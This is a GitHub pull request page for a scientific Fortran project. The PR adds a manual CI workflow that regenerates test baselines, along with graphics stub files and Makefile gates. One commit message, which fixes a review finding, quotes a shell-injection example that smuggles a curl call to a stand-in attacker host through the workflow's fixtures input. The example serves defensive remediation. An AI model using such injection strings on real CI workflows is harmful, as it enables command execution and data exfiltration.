ci+eq+tr: workflow_dispatch baseline regen + graphics-stubs (#197)#198
Merged
Conversation
Design for issue #197 (CI vs clavius gfortran 13.2/13.3 drift): add a workflow_dispatch CI job that regenerates baselines in CI's own environment, sidestepping the clavius cross-host drift that blocked PR #196. Two-layer scope: - Layer A (Fortran): eq_static_stubs.f90 + tr_static_stubs.f90 mirroring tot's existing graphics-stub pattern + Makefile gates. Enables standalone eq.x / tr2 builds without graphics libs in CI. - Layer B (CI): .github/workflows/regen-baselines.yml with workflow_dispatch trigger, configurable `fixtures` input (default 'eq_tst2 tr_tst2'), artifact upload of generated metrics.json files. Output handoff: artifact upload (MVP). Auto-PR / auto-commit deferred. 6 files in one commit (4 Fortran + 1 yaml + 1 spec). Approved scope from brainstorming on 2026-05-12. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Bite-sized 11-task implementation plan for the spec at docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md (committed 6deddeb, 4 Codex review rounds converged). Structure: - Pre-flight: worktree + sanity (Task 0.1) - Phase 1 (Tasks 1-4): Layer A — eq + tr static stub files + Makefile GFLIBS gates. Per-file: copy from tot precedent, header adjust, body verify, AST sanity, Makefile edit, GFLIBS-empty smoke build. - Phase 2 (Task 5): Layer B — full regen-baselines.yml workflow file embedded in the plan (~210 lines). YAML lint + referenced-file existence checks. - Phase 3 (Tasks 6-7): Final verification (gate flips correctly in both GFLIBS directions) + single commit. - Phase 4 (Tasks 8-10): Pre-push gate (bounded pytest + parallel reviewers) + push + PR. - Phase 5 (Task 11): Trigger first workflow_dispatch + verify artifact. Each task has exact commands, expected outputs, and (where bodies change) full code snippets. Workflow YAML is embedded verbatim. Self-review: spec coverage complete (each §4 component → 1+ tasks), no placeholders (runtime values like <PR#> noted as substitutions), names consistent across tasks. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…/ tr2 (#197) Adds an in-CI baseline-regeneration workflow plus the Fortran graphics-stubs that let the standalone eq / tr2 binaries build in CI's gfortran-13.2 / Ubuntu-24.04 / no-graphics environment. Closes #197 and unblocks the #190 (tr_tst2 baseline backfill) path that PR #196 ran into. Layer A (Fortran): - eq/eq_static_stubs.f90: NEW, copy of tot/tot_static_stubs.f90 with comment header adjusted for eq context. ~378 lines, ~100 GSAF no-op SUBROUTINEs + 2 FUNCTIONs. - tr/tr_static_stubs.f90: NEW, same pattern for tr. - eq/Makefile, tr/Makefile: add the `ifeq ($(strip $(GFLIBS)),)` gate (mirror tot/Makefile:64-70) that conditionally links EQ_STATIC_STUBS_OBJ / TR_STATIC_STUBS_OBJ into the standalone binary target. With GFLIBS populated (clavius / dev hosts), gate expands empty -> no link impact. With GFLIBS empty (CI / no-graphics), links the stubs. Layer B (CI): - .github/workflows/regen-baselines.yml: NEW, ~210 lines. - workflow_dispatch trigger with `fixtures` input (default "eq_tst2 tr_tst2"). - runs-on: ubuntu-24.04 (pinned, NOT ubuntu-latest), matching python-tests.yml's gfortran 13.2.0 environment. - concurrency block (mirrors python-tests.yml:15-17). - permissions: contents: read (least-privilege). - Per-module dump-path dispatch by fixture-name prefix (tr_* / eq_* / tot_* / fp_* / ti_* / wr_* / wrx_*). - Narrow failure detection: `test -s <dump>` guard distinguishes binary crash from expected baseline-mismatch. - Per-module shape check (jq): tr/eq require non-empty scalars; tot allows empty scalars (TR_PRESENT=0 valid per extract_tot_metrics.py:5-10). - Uploads regen-output/ as artifact (90-day retention). Stub-duplication trade-off: 3 files (tot + eq + tr) now contain the same ~378-line no-op stub body. Accepted per spec §3 non-goals - shared lib/ refactor is a follow-up. Stubs change rarely (every ~6 months when a new graphics symbol appears). Spec: docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md (376 lines, 4 Codex review rounds converged). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Owner
Author
|
@cursor review |
…cument env-pin divergence (Bugbot LOW) Bugbot found 2 issues on PR #198 HEAD 98298ea: MEDIUM (security): the `for fixture in ${{ inputs.fixtures }}` line expanded the workflow_dispatch input directly into the shell script body before bash parsed it. A user with write access triggering the workflow could inject arbitrary shell commands through the fixtures input (e.g. `eq_tst2"; curl evil.example/exfil`). Mitigation: pass via `env: FIXTURES: ${{ inputs.fixtures }}` so bash reads it as a normal variable. The case-statement restriction to tr_*/eq_*/tot_* prefixes provides defense in depth. LOW (env divergence): this workflow pins runs-on: ubuntu-24.04 to match python-tests.yml's current gfortran 13.2.0, but python-tests.yml uses ubuntu-latest, which will silently rotate to a newer compiler. Documented the divergence risk inline with the mitigation (pin python-tests.yml when GH rotates). Same workflow file; no test impact (the Bugbot findings affect runtime behaviour on triggered runs, not the workflow's static YAML structure or python-tests.yml flow). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Owner
Author
|
@cursor review |
There was a problem hiding this comment.
✅ Bugbot reviewed your changes and found no new issues!
Comment @cursor review or bugbot run to trigger another review on this PR
Reviewed by Cursor Bugbot for commit 82786d6. Configure here.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Closes #197 (CI baseline regen env mismatch — clavius gfortran 13.3 vs CI gfortran 13.2 produces ~3e-9 drift on
eq_tst2/tr_tst2profile arrays). Unblocks #190 (tr_tst2baseline backfill).Adds an in-CI baseline-regeneration workflow plus the Fortran graphics-stubs that let
eq.x/tr2standalone binaries build in CI's gfortran-13.2 / Ubuntu-24.04 / no-graphics environment.Background
PR #196 attempted to resolve #190 by regenerating baselines on clavius (gfortran 13.3). CI rejected the result at 1e-10 tolerance because of compiler-version drift. The diagnostic surfaced that baselines must be generated in the same environment they will be compared against — i.e., CI's Ubuntu 24.04 + gfortran 13.2. This PR is the environment-alignment infrastructure.
Changes (5 files, 1 commit)
eq/eq_static_stubs.f90tot/tot_static_stubs.f90body (~378 lines, ~100 GSAF no-op SUBROUTINEs + 2 FUNCTIONs); leading comment header customized for eq contexttr/tr_static_stubs.f90eq/MakefileEQ_STATIC_STUBS_OBJGFLIBS-empty gate (mirrortot/Makefile:64-70); include ineqtarget deps + link linetr/Makefiletr2target. Adaptation: uses$(OBJDIR)/tr_static_stubs.obecause tr's compile rule is${OBJDIR}/%.o: %.f90only (eq has a flat.f90.o:rule, so eq stays unprefixed) — documented inline.github/workflows/regen-baselines.ymlworkflow_dispatchtrigger,fixturesinput (default"eq_tst2 tr_tst2"); pinnedruns-on: ubuntu-24.04;concurrency:+permissions: contents: read; usesmake -C tot libscanonical build chain (in-house review MED #1); narrow failure detection (test -sguard); per-module shape check (tot allows empty scalars perextract_tot_metrics.py:5-10, others require non-empty); narrowed dispatch to supported prefixes (tr_*/eq_*/tot_*;fp/ti/wr/wrxrejected with clear error per Codex MED);actions/upload-artifact@v4withretention-days: 90+if-no-files-found: errorPlus spec at
docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md(376 lines, 4 Codex review rounds converged) and plan atdocs/superpowers/plans/2026-05-12-ci-baseline-regen-workflow.md(891 lines, 12 tasks) in earlier commits on this branch.Verification
make -n eq GFLIBS=""/<populated>andmake -n tr2 GFLIBS=""/<populated>— stub objects appear in link line iff GFLIBS empty. Both directions confirmed.python3 -c "import yaml; yaml.safe_load(...)"succeeds.git diff origin/develop --name-onlyexcludestest_pipeline.pyandtest_compare_metrics.py, confirming the 2 pre-existing failures are not introduced by this PR.python-tests.ymlworkflow continues to PASS (this PR does not modify it).regen-baselines.ymlfrom Actions UI withfixtures="eq_tst2 tr_tst2". Should complete in ~10-15 min and produce a non-emptybaselines-<run-id>.zipartifact containingeq_tst2/metrics.json(12 scalars) +tr_tst2/metrics.json(14 scalars incl. AJRFT=0.0).Review trail
fixturesinput.make.header— fixed by copying fullpython-tests.yml:112-134content) → ✅.make -C tot libscanonical chain, dropped unused PIC builds, narrowed case dispatch).Follow-ups (post-merge)
After this PR merges:
regen-baselines.ymlwithfixtures="eq_tst2 tr_tst2".metrics.jsonfiles + remove the@pytest.mark.xfaildecorator added in PR test(trlib): mirror eqlib eqdata fallback to fix silent SKIP (#192) #195. This closes tr_tst2 baseline: backfill AJRFT after eq_tst2 drift fix #190 cleanly.fp_*/ti_*/wr_*/wrx_*fixtures: addfp_static_stubs.f90etc. + Makefile gates. Separate scope.🤖 Generated with Claude Code
Note
Medium Risk
Adds a new GitHub Actions workflow that builds and runs standalone Fortran binaries in CI and changes
eq/tr2link behavior whenGFLIBSis empty; misconfiguration or missing stubs could break CI baseline regeneration or no-graphics builds.Overview
Adds a new manual GitHub Actions workflow (
regen-baselines.yml) to regenerate per-fixturemetrics.jsonbaselines inside CI’s pinnedubuntu-24.04/gfortran environment, then upload the regenerated files as an artifact.Enables no-graphics CI builds of the standalone
eqandtr2binaries by adding large no-op graphics stub files (eq_static_stubs.f90,tr_static_stubs.f90) and gating their linkage ineq/Makefileandtr/MakefilewhenGFLIBSis empty, so baseline regen can run without graphics libraries.Adds accompanying design/implementation documentation in
docs/superpowers/specs/...anddocs/superpowers/plans/...detailing the workflow, risks, and follow-up steps.Reviewed by Cursor Bugbot for commit 82786d6. Bugbot is set up for automated code reviews on this repo. Configure here.